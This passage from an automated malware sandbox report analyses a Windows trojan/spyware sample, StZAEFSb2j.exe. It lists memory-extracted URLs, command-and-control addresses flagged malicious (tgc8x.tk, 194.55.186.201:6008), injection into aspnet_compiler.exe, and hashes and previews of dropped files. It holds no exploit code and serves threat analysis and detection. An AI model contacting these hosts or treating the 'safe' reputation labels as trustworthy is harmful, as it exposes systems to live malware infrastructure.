                                            http://ns.adobe.c/gaspnet_compiler.exe, 00000001.00000003.412663066.0000000008CB2000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000003.412625368.0000000008CB0000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000003.412575103.0000000008CB0000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000003.402236725.0000000008CA1000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000003.412702825.000000000152D000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://tgc8x.tk4StZAEFSb2j.exe, 00000000.00000002.320562361.0000000002B54000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://tempuri.org/Endpoint/VerifyUpdateResponseaspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://tempuri.org/Endpoint/SetEnvironaspnet_compiler.exe, 00000001.00000002.416745991.00000000030DB000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=aspnet_compiler.exe, 00000001.00000003.399325054.00000000080B1000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000002.430638568.0000000004243000.00000004.00000800.00020000.00000000.sdmp, tmpB95.tmp.1.dr, tmpD30.tmp.1.dr, tmpC92.tmp.1.dr, tmpC33.tmp.1.dr, tmpCC2.tmp.1.dr, tmpDBF.tmp.1.dr, tmpBF4.tmp.1.dr, tmpEBC.tmp.1.dr, tmpE8C.tmp.1.dr, tmpF80C.tmp.1.dr, tmpD60.tmp.1.dr, tmpE2D.tmp.1.drfalse
                                              high
                                              http://tempuri.org/Endpoint/SetEnvironmentaspnet_compiler.exe, 00000001.00000002.416745991.00000000030DB000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://tempuri.org/Endpoint/SetEnvironmentResponseaspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://tgc8x.tkStZAEFSb2j.exe, 00000000.00000002.320604810.0000000002B5D000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://tgc8x.tkD8StZAEFSb2j.exe, 00000000.00000002.321171028.0000000002BC4000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://194.55.186.201:6008aspnet_compiler.exe, 00000001.00000002.415787658.0000000002FF2000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://tempuri.org/Endpoint/GetUpdatesaspnet_compiler.exe, 00000001.00000002.415787658.0000000002FF2000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000002.415555604.0000000002FAF000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000002.415687042.0000000002FDA000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              https://ac.ecosia.org/autocomplete?q=tmpE2D.tmp.1.drfalse
                                                high
                                                https://search.yahoo.com?fr=crmas_sfpaspnet_compiler.exe, 00000001.00000003.399325054.00000000080B1000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000002.430638568.0000000004243000.00000004.00000800.00020000.00000000.sdmp, tmpB95.tmp.1.dr, tmpD30.tmp.1.dr, tmpC92.tmp.1.dr, tmpC33.tmp.1.dr, tmpCC2.tmp.1.dr, tmpDBF.tmp.1.dr, tmpBF4.tmp.1.dr, tmpEBC.tmp.1.dr, tmpE8C.tmp.1.dr, tmpF80C.tmp.1.dr, tmpD60.tmp.1.dr, tmpE2D.tmp.1.drfalse
                                                  high
                                                  https://api.ipify.orgcookies//settinString.RemovegStZAEFSb2j.exe, 00000000.00000002.321721404.00000000042B9000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000000.316565039.0000000000402000.00000040.00000400.00020000.00000000.sdmptrue
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://schemas.xmlsoap.org/ws/2004/08/addressingaspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://194.55.186.201:aspnet_compiler.exe, 00000001.00000002.416745991.00000000030DB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://schemas.xmlsoap.org/ws/2004/08/addressing/faultaspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://tempuri.org/Endpoint/GetUpdatesResponseaspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://tempuri.org/Endpoint/EnvironmentSettingsResponseaspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://tempuri.org/Endpoint/VerifyUpdateaspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://tempuri.org/0aspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://tgc8x.tkStZAEFSb2j.exe, 00000000.00000002.320164097.0000000002B46000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameStZAEFSb2j.exe, 00000000.00000002.320164097.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=tmpE2D.tmp.1.drfalse
                                                          high
                                                          http://schemas.xmlsoap.org/soap/actor/nextaspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs
                                                            IPDomainCountryFlagASNASN NameMalicious
                                                            50.115.174.192
                                                            tgc8x.tkUnited States
                                                            32875VIRPUStrue
                                                            194.55.186.201
                                                            unknownGermany
                                                            39855MOD-EUNLtrue
                                                            Joe Sandbox Version:36.0.0 Rainbow Opal
                                                            Analysis ID:736967
                                                            Start date and time:2022-11-03 12:43:40 +01:00
                                                            Joe Sandbox Product:CloudBasic
                                                            Overall analysis duration:0h 8m 27s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:light
                                                            Sample file name:StZAEFSb2j.exe
                                                            Cookbook file name:default.jbs
                                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                            Number of analysed new started processes analysed:5
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:0
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • HDC enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Detection:MAL
                                                            Classification:mal100.troj.spyw.evad.winEXE@4/26@3/2
                                                            EGA Information:
                                                            • Successful, ratio: 100%
                                                            HDC Information:Failed
                                                            HCA Information:
                                                            • Successful, ratio: 100%
                                                            • Number of executed functions: 0
                                                            • Number of non-executed functions: 0
                                                            Cookbook Comments:
                                                            • Found application associated with file extension: .exe
                                                            • Stop behavior analysis, all processes terminated
                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, conhost.exe
                                                            • TCP Packets have been reduced to 100
                                                            • Excluded IPs from analysis (whitelisted): 172.67.75.172, 104.26.13.31, 104.26.12.31
                                                            • Excluded domains from analysis (whitelisted): api.ip.sb.cdn.cloudflare.net
                                                            • Not all processes where analyzed, report is missing behavior information
                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                            TimeTypeDescription
                                                            12:44:40API Interceptor1x Sleep call for process: StZAEFSb2j.exe modified
                                                            12:45:08API Interceptor74x Sleep call for process: aspnet_compiler.exe modified
                                                            No context
                                                            No context
                                                            No context
                                                            No context
                                                            No context
                                                            Process:C:\Users\user\Desktop\StZAEFSb2j.exe
                                                            File Type:CSV text
                                                            Category:dropped
                                                            Size (bytes):847
                                                            Entropy (8bit):5.35816127824051
                                                            Encrypted:false
                                                            SSDEEP:24:ML9E4Ks2wKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7a:MxHKXwYHKhQnoPtHoxHhAHKzva
                                                            MD5:31E089E21A2AEB18A2A23D3E61EB2167
                                                            SHA1:E873A8FC023D1C6D767A0C752582E3C9FD67A8B0
                                                            SHA-256:2DCCE5D76F242AF36DB3D670C006468BEEA4C58A6814B2684FE44D45E7A3F836
                                                            SHA-512:A0DB65C3E133856C0A73990AEC30B1B037EA486B44E4A30657DD5775880FB9248D9E1CB533420299D0538882E9A883BA64F30F7263EB0DD62D1C673E7DBA881D
                                                            Malicious:true
                                                            Reputation:high, very likely benign file
                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..
                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):2412
                                                            Entropy (8bit):5.341108361394489
                                                            Encrypted:false
                                                            SSDEEP:48:MOfHK5HKXAHKdHKBSTHaAHKzvRYHKhQnoPtHoxHImHKhBHKoHaHZHAHjHKoLHG1V:vq5qXAqdqslqzJYqhQnoPtIxHbqLqo67
                                                            MD5:5D4B4A6BFACB854E7F2C4ADB625D1F71
                                                            SHA1:FC542A0C19178B77638600EA36378BA3F64BC677
                                                            SHA-256:170BA6EFCB3905EA4870D3771B9F38F64D079F8E3871032023B5EB6CAEF618B0
                                                            SHA-512:BBC9AA745C2F44B5572EFA2B15FA45494E786F69339FC9ED8C52AAF7DA8AB3D48C24EF4106850892B9A711BA968DE71F11321CD1CAFE2F745A9CA7BAE4F197EC
                                                            Malicious:false
                                                            Reputation:moderate, very likely benign file
                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.ServiceModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"SMDiagnostics, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\34957343ad5d84daee97a1affda91665\System.Runtime.Serialization.ni.dll",0..2,"System.ServiceModel.Internals, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral,
                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1026
                                                            Entropy (8bit):4.687055908915499
                                                            Encrypted:false
                                                            SSDEEP:24:X3rfasg2Tpd/zBJY+q9FZP0DJR6BdqWD5gB8H36D6jXLiUk2ZTV:X+52L/dJYBjYJRoddD5C8HqD8ZDZTV
                                                            MD5:94EDB575C55407C555A3F710DF2A8CB3
                                                            SHA1:3AB8DF4B92C320D7D4C661EAB608E24B43F3DD13
                                                            SHA-256:DD3A4A93D60E4B7840557A44DAAF77F6B6F85032C7DD5FB10BE54C07B0E1E261
                                                            SHA-512:F8F78D10AE19735413AF11F0C8DAC41644479D345DC6B300412DEDA9779A01DDFC7150FBFD54F2582A0DF8524B7E507886DBC49E59B084320017E9E64FC8DBFA
                                                            Malicious:false
                                                            Preview:JDDHMPCDUJFORBKGTIFQHFPQNEKFAIHGBDYZBWNZMVTSZXTGRUOCZPQRXMGXBNMAHGODCTVNAHQHZMJYIYXLTVDMEAVEXSWFQCDVPRSSLREITYMWHUXVVKLPJXQJOHYPAVYXSIMBBOTIWYDKNCDVKZZMEIFEDNNXHAHMYLPOUGNKMPZVDEQRUPZBQCKZDQINFECCUZINROAFGLIAMVWHXPPXOWZMWTITWBJFIENEHRXRHRPVUAIUAJUYDBBSQQMTJJXOAAMHVKJEOIQRSNKKQSGCHAUKUYPJEBZIGZTVKUXZEQOUSZPQBHKFHECDNFGTGIDHSJFVLAKZPDYVJVWECRIKKUCCFNNHBLBFCJEKSUZTITTTLQVOHKFHXFIIYDOZNAIBCDIRXJAYKHCOEXBOGSGEGGQEMHFXIZREOFZJSAFXTGSSZLVKYOANMZNPNESDZMFYWTZHIKUSMZXACWZEIMGTFRSZCGICPOSTZRECQYWZECQVLAWXESWPCDXLHIMJHSZJSDAXNXHETAWLZDXTZAPKBHSMKMYYGVSJCUIJSIFUHHMPIRBASPUOUXKKPQCECQBBZUSIXEOXLFFSQIFCTAIRASCMWEHFOXGEJRXFGJODUTKITHEAKFFJQTQNWWKXXDELWDHHEDWUTMSLXQJPVGOBKELYSRBQFYKXFHWGSCVLTCFKOEJMLUXIZVDPFHXHTSMTDRTVCNLISGJFVQRUTMZDYPUYBAEASZCSEUVHWRIQDEJIZQQHJNTIIICFMMPVLXOIVTPCTDKFPDVWXSBXZDXFUMBJTJMKOOHIMIOAKEJSIDIOJSRMRYXLDVGDBBYXARBNHXOXMBXYOTEFOAXRAUKXTWKYYGWNAHHCIIKQHYAETGBWABTEMJKNTEUQAWGHRIKDGGNHUIVVPPYPYTZERZKDPLUSIKPBDPJOCBYQJDEKAVQKHFTPBZJQOUCVBHAHZZGEXOCYGYDCZICBOETRSJSMVEZKINDRIKZYTUIS
                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1026
                                                            Entropy (8bit):4.697125102277996
                                                            Encrypted:false
                                                            SSDEEP:24:uVOXLU7xwK58ZsokCVVZGi4eW0ZFJVPNR+x:c7xR8mwGi4sbv+x
                                                            MD5:207485EFCE70435971C31586A1E4CF97
                                                            SHA1:245A410AEB767B099944A8E81F75FC9A4B270DFB
                                                            SHA-256:BF45E8FD687DC0E63FD40F32F2279152430579EDE044C3BB0852A1AC460D4B09
                                                            SHA-512:A7F01CBBAFE9EA12B4C820F5E1A107D4C6FBD57CFF41C4AC679485F2B7DAFA4E9148AF830A39A083EC866E988A8E279FEB39D5EB58593E75D22253BED4DEFA19
                                                            Malicious:false
                                                            Preview:QCOILOQIKCUYMAHQLCLSCUGPPLVTJEARXPXBWFLOFHRVUSXLZVWHDQNKEMGPPQAGBLIPFAECDZNKKHITNQJASUXZAYMZIQCEHAQMCVZBMFUDBNQEKCBNCGMUWXDJLMJKVRKYBLRGNWGBGEVIGVROENGUXKJERNJSJJEMVLDKUXDFUWUPQNWUYRIEPUFOQKPDSZXXCKNQVBEAVMDMBRZSWYPCNALGHTDFWFNDXKSHXCRLYPVFVYVEOFRHUFZZGNIXSJQCPZGONOYWWUQLBEBGALPOGZBXJUYXTHWOKWNKJYPSELALXQYIKAHXCELBTKSQFTNYWBHRPQFULPLOCWEQAXEQNXOBIQOYFSEEZWHQQLZPBQOUMVZIMRWRLSPDKEBXSTPZLAGVYIORHCDBXTBHYOFKACXVGKKSIFHPOLDOQGIDQPFPVIPGUCGUCQLFFBYAGFJYFOMBUMPAHPQLDOHYAMKEGSDPXEYBQJUOWZOPFYRTLYUYDJHPLVEXBXUGVUEYIBUTUABUIHROFHZMLJUXWGZILWRHVKGOSZXXCIWGRGUZQDKQMTXRRWHDLJPPIRDALEIAYYTEEONIAELEISEOGNTDSALVOZDMFPLJSJMKJYMWGSKCTXHTLYYFJSXNZMDELRTJBNXSGAOEPKCPEEPFZKCAATOWHUWGQAEQNZHTKQEUCFRXVJWOGAEQDIWARNNFKCHEDRWTKEOVTURBKPDMQPPDCJGTYCTIRELHGRIRLWAPLCEHANSMGDZZYCXXDOTQVOSDZJAEBOTEVLSMHXCOWDPVQPSGDIDBAWUTDPIYPVBFSUMFBUYOPRXLECFHENURLSLKGPFWXDUFYOAKNTFKOYFUZEKLRZOLPYKMCKVZOIMDCCSGPQNCQXJOTJDKUQEPVHFKRSGZYJBNUHVTOEMNLTDXGZHTDQFQZCOULTNVZRAVLOIOVIKUTWPYLRJUCUDMYVYFWSBLJTJKMSJEIJXWYNPKGTYLKDAEVBUQUIJX
                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1026
                                                            Entropy (8bit):4.697427014915338
                                                            Encrypted:false
                                                            SSDEEP:24:J87vGcgdreYqco0NFLg5eIatTFj9qVUq2Z:J83gAYq8NFRtx7Z
                                                            MD5:2D7ACA56B5F340F28DD1D2B46D700BA6
                                                            SHA1:3966684FF029665614B8DC948349178FB9E8C078
                                                            SHA-256:B227E5E45D28AC063349BC70CC01A3F6DB15C101432A8609E0202064F7E5936D
                                                            SHA-512:D4BFC2BB839DAEBAE8C894A0B8EB2314D2BE0304C82EB89BE16D6C820874952534CE0D93AE62EEF3DD2BE8A4D1E828B883E50BD204D04624AB945119D2FAB4F0
                                                            Malicious:false
                                                            Preview:ZIPXYXWIOYFFJDUIEBFLHIUBYNNMJGYPFQONGOLQHGMFRFYQGSVGNDSCQJYWDCIKWJWNYHFUEMJVEPAFIPAROVFAVARCOHESRJKUIUYDXNZOERBEQGHQNKYMVMEEMKKKEYXXPAKWYGCIXNFSVDOOEUTNGSDXMYEZKQTRDCZXZXIFSRMNAEPZWJKKYULUPGZCQORNOJBGAAOPLYNJCPFWSASJWTLALTQZLWOGFWQVOXGYBCMNEBDESHLNZZBETDIGNLTNPZEPEQAMYCNYWEKKQKDVZPNYLWAFZIPSSVNHOPUMIBTFXVVCNCPUSOKETVBDNZLCRKBRLGSHFSQLECHUOWGFFEMDWHASNSMAXKZZMDLZVQLADFBDUCCIJERQXKRXUCTKGDGKPESHHXUPKZSGNKOITMVITFCBELJVTCKENQCMCJEDZJDQDSKAYFGQEYICXDUOIJRYIMVXRKNBYXQEHUHYSPGEDSJBOQNXHFTSSRTPOXDVFXEPQUGWNEAKZJOKYPEYKXMOMKTKOBVISHMUGELPJCXBYNEXOAWOXHSEELVSCFMZYAMOLTGIWURMTZTRNGMWQZBRQHAIXVJIAFPZGWJZIOQLOAXJSGKMZNZCAVJWFGUFMQWQICMPVNAYRUHAMQLWLJMBERSFPEZHMNVAZFQAJEGYJQOMQWFTQVXZYTDPYVGZZPSNSOJWWKZDRPZKGTXYSENWOIQFXDIRWPJEYALOOEYQPHOPKSIZFNHPOXOKSTDVPNBSCDDKPOUVXMFBUNBMEUYGOSYMHMUNKKADTAEIUEMXYPOPMUVBHTBVKYAHHJXFUJPFZJZARAFLARBIWKXMNKXJLVBLJSZYYVIBZHROONQENYZGGMMETTMOFHCCQNUHPDEUTVVGUDBCKVXVUMRWPGZIPPUXJEJQIEQWLBUQBUODMWPSBFOYIQZWMYWPHWSKTRCKCRXWZUOTDTDRLLUSSQZXZZEATFSHBUWQUYHDLRMVVWFCPAZNSBXA
                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1026
                                                            Entropy (8bit):4.687055908915499
                                                            Encrypted:false
                                                            SSDEEP:24:X3rfasg2Tpd/zBJY+q9FZP0DJR6BdqWD5gB8H36D6jXLiUk2ZTV:X+52L/dJYBjYJRoddD5C8HqD8ZDZTV
                                                            MD5:94EDB575C55407C555A3F710DF2A8CB3
                                                            SHA1:3AB8DF4B92C320D7D4C661EAB608E24B43F3DD13
                                                            SHA-256:DD3A4A93D60E4B7840557A44DAAF77F6B6F85032C7DD5FB10BE54C07B0E1E261
                                                            SHA-512:F8F78D10AE19735413AF11F0C8DAC41644479D345DC6B300412DEDA9779A01DDFC7150FBFD54F2582A0DF8524B7E507886DBC49E59B084320017E9E64FC8DBFA
                                                            Malicious:false
                                                            Preview:JDDHMPCDUJFORBKGTIFQHFPQNEKFAIHGBDYZBWNZMVTSZXTGRUOCZPQRXMGXBNMAHGODCTVNAHQHZMJYIYXLTVDMEAVEXSWFQCDVPRSSLREITYMWHUXVVKLPJXQJOHYPAVYXSIMBBOTIWYDKNCDVKZZMEIFEDNNXHAHMYLPOUGNKMPZVDEQRUPZBQCKZDQINFECCUZINROAFGLIAMVWHXPPXOWZMWTITWBJFIENEHRXRHRPVUAIUAJUYDBBSQQMTJJXOAAMHVKJEOIQRSNKKQSGCHAUKUYPJEBZIGZTVKUXZEQOUSZPQBHKFHECDNFGTGIDHSJFVLAKZPDYVJVWECRIKKUCCFNNHBLBFCJEKSUZTITTTLQVOHKFHXFIIYDOZNAIBCDIRXJAYKHCOEXBOGSGEGGQEMHFXIZREOFZJSAFXTGSSZLVKYOANMZNPNESDZMFYWTZHIKUSMZXACWZEIMGTFRSZCGICPOSTZRECQYWZECQVLAWXESWPCDXLHIMJHSZJSDAXNXHETAWLZDXTZAPKBHSMKMYYGVSJCUIJSIFUHHMPIRBASPUOUXKKPQCECQBBZUSIXEOXLFFSQIFCTAIRASCMWEHFOXGEJRXFGJODUTKITHEAKFFJQTQNWWKXXDELWDHHEDWUTMSLXQJPVGOBKELYSRBQFYKXFHWGSCVLTCFKOEJMLUXIZVDPFHXHTSMTDRTVCNLISGJFVQRUTMZDYPUYBAEASZCSEUVHWRIQDEJIZQQHJNTIIICFMMPVLXOIVTPCTDKFPDVWXSBXZDXFUMBJTJMKOOHIMIOAKEJSIDIOJSRMRYXLDVGDBBYXARBNHXOXMBXYOTEFOAXRAUKXTWKYYGWNAHHCIIKQHYAETGBWABTEMJKNTEUQAWGHRIKDGGNHUIVVPPYPYTZERZKDPLUSIKPBDPJOCBYQJDEKAVQKHFTPBZJQOUCVBHAHZZGEXOCYGYDCZICBOETRSJSMVEZKINDRIKZYTUIS
                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1026
                                                            Entropy (8bit):4.697125102277996
                                                            Encrypted:false
                                                            SSDEEP:24:uVOXLU7xwK58ZsokCVVZGi4eW0ZFJVPNR+x:c7xR8mwGi4sbv+x
                                                            MD5:207485EFCE70435971C31586A1E4CF97
                                                            SHA1:245A410AEB767B099944A8E81F75FC9A4B270DFB
                                                            SHA-256:BF45E8FD687DC0E63FD40F32F2279152430579EDE044C3BB0852A1AC460D4B09
                                                            SHA-512:A7F01CBBAFE9EA12B4C820F5E1A107D4C6FBD57CFF41C4AC679485F2B7DAFA4E9148AF830A39A083EC866E988A8E279FEB39D5EB58593E75D22253BED4DEFA19
                                                            Malicious:false
                                                            Preview:QCOILOQIKCUYMAHQLCLSCUGPPLVTJEARXPXBWFLOFHRVUSXLZVWHDQNKEMGPPQAGBLIPFAECDZNKKHITNQJASUXZAYMZIQCEHAQMCVZBMFUDBNQEKCBNCGMUWXDJLMJKVRKYBLRGNWGBGEVIGVROENGUXKJERNJSJJEMVLDKUXDFUWUPQNWUYRIEPUFOQKPDSZXXCKNQVBEAVMDMBRZSWYPCNALGHTDFWFNDXKSHXCRLYPVFVYVEOFRHUFZZGNIXSJQCPZGONOYWWUQLBEBGALPOGZBXJUYXTHWOKWNKJYPSELALXQYIKAHXCELBTKSQFTNYWBHRPQFULPLOCWEQAXEQNXOBIQOYFSEEZWHQQLZPBQOUMVZIMRWRLSPDKEBXSTPZLAGVYIORHCDBXTBHYOFKACXVGKKSIFHPOLDOQGIDQPFPVIPGUCGUCQLFFBYAGFJYFOMBUMPAHPQLDOHYAMKEGSDPXEYBQJUOWZOPFYRTLYUYDJHPLVEXBXUGVUEYIBUTUABUIHROFHZMLJUXWGZILWRHVKGOSZXXCIWGRGUZQDKQMTXRRWHDLJPPIRDALEIAYYTEEONIAELEISEOGNTDSALVOZDMFPLJSJMKJYMWGSKCTXHTLYYFJSXNZMDELRTJBNXSGAOEPKCPEEPFZKCAATOWHUWGQAEQNZHTKQEUCFRXVJWOGAEQDIWARNNFKCHEDRWTKEOVTURBKPDMQPPDCJGTYCTIRELHGRIRLWAPLCEHANSMGDZZYCXXDOTQVOSDZJAEBOTEVLSMHXCOWDPVQPSGDIDBAWUTDPIYPVBFSUMFBUYOPRXLECFHENURLSLKGPFWXDUFYOAKNTFKOYFUZEKLRZOLPYKMCKVZOIMDCCSGPQNCQXJOTJDKUQEPVHFKRSGZYJBNUHVTOEMNLTDXGZHTDQFQZCOULTNVZRAVLOIOVIKUTWPYLRJUCUDMYVYFWSBLJTJKMSJEIJXWYNPKGTYLKDAEVBUQUIJX
                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1026
                                                            Entropy (8bit):4.697427014915338
                                                            Encrypted:false
                                                            SSDEEP:24:J87vGcgdreYqco0NFLg5eIatTFj9qVUq2Z:J83gAYq8NFRtx7Z
                                                            MD5:2D7ACA56B5F340F28DD1D2B46D700BA6
                                                            SHA1:3966684FF029665614B8DC948349178FB9E8C078
                                                            SHA-256:B227E5E45D28AC063349BC70CC01A3F6DB15C101432A8609E0202064F7E5936D
                                                            SHA-512:D4BFC2BB839DAEBAE8C894A0B8EB2314D2BE0304C82EB89BE16D6C820874952534CE0D93AE62EEF3DD2BE8A4D1E828B883E50BD204D04624AB945119D2FAB4F0
                                                            Malicious:false
